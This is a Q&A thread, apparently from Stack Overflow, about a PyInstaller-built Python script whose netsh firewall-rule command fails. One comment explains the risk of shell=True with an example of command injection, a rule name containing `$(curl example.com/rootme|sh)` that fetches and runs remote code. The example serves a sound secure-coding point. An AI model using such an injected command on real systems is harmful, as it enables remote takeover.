# subprocess.CalledProcessError: Command 'netsh advfirewall returned non-zero exit status 1

Tags: python, firewall, netsh

Hi guys Im trying to edit firewall rules via an executable script (.exe)

this is the basic code snippet that I'm running

```py
command = "netsh advfirewall firewall add rule name=dupa8 action=allow profile=any localip=192.162.250.0/24 remoteip=192.162.250.0/24 dir=in"
encoding = "cp949"

out = str(subprocess.check_output(command).decode(encoding=encoding_type, errors="ignore"))
print(f'Out result {out}')
```

this works okay when I run it like script or in python via cmd but when I compile it to exe via pyinstaller I get

subprocess.CalledProcessError: Command 'netsh advfirewall...."  returned non-zero exit status 1.

Comment: Can you check whether the command is on your `PATH`? What's the precise error message?

Comment: You need `shell=True` if you're going to pass it as a single string. Better practice is to split into words (`command = ['netsh', 'advfirewall', 'firewlal', 'add', 'rule', 'name=dupa8', 'action=allow', 'profile=any', 'localip=192.168.250.0/24', 'remoteip=192.168.250.0', 'dir=in']`) -- that's particularly important if the source of any of this configuration is untrusted

Comment: (if you're, say, writing the admin interface for a router that's intended to be a closed system where users don't have root, specifying a name that contains `$(curl example.com/rootme|sh)` is something said users might try; sticking to the default `shell=False` neuters those attacks, assuming `netsh` is written safely)

Comment: @CharlesDuffy im making setup file that adds exceptions to the firewall then the system running on that computer can communicate with other devices (internal network). So user will need to run setup.exe and then program.exe

Comment: @tripleee no it isn't and the precise error message is subprocess.CalledProcessError: Command "netsh advfirewall firewall add rule name=dupa8 action=allow profile=any localip=192.162.250.0/24 remoteip=192.162.250.0/24 dir=in returned non-zero exit status 1"

Comment: @CharlesDuffy The rules are different on Windows; I assume the OP is an unhappy Windows victim.

Comment: If you are trying to say that the command is not on the `PATH` then that's your explanation right there. I would expect a slightly different error message in that case, though.

Comment: @rafaelHTML, if this is in fact Windows, be sure to tag appropriately.

Comment: (That said, it's clear that it is; if this were UNIX you'd have a command-not-found error, not an error about the command exiting with an error after it _was_ successfully located)

Comment: Unfortunately nothing changed